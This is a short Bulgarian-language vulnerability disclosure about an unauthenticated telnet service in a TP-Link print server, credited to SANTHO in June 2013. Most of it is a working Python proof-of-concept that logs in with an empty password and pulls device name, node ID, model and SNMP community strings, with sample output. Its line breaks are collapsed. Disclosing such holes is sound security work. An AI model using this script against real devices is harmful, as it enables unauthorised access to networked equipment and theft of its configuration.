При стартиран телнет сървиз атакуващият получава пълен достъп до конфигуриращите настройки. Дупката е открита от SANTHO на 19.06.2013 и до монета на тази публикация няма реакция от производителя.
Пример:
root@bt# ./tplink-enum.py 10.0.0.2Device Name : 1P_PrintServABCDNode ID : AA-AA-AA-AA-AA-AAManufacture: Hewlett-PackardModel: HP LaserJet M1005Community 1: public Read-OnlyCommunity 2: public Read-Onlyimport telnetlibimport syshost = sys.argv[1]tn = telnetlib.Telnet(host)tn.read_until("Password:")tn.write("\r\n")tn.read_until("choice")tn.write("1\r\n")tn.read_until("choice")tn.write("1\r\n")data = tn.read_until("choice")for i in data.split("\r\n"):if "Device Name" in i:print i.strip()if "Node ID" in i:print i.strip()tn.write("0\r\n")tn.read_until("choice")tn.write("2\r\n")data = tn.read_until("choice")for i in data.split("\r\n"):if "Manufacture:" in i:print i.strip()if "Model:" in i:print i.strip()tn.write("0\r\n")tn.read_until("choice")tn.write("5\r\n")data = tn.read_until("choice")for i in data.split("\r\n"):if "Community" in i:print i.strip()
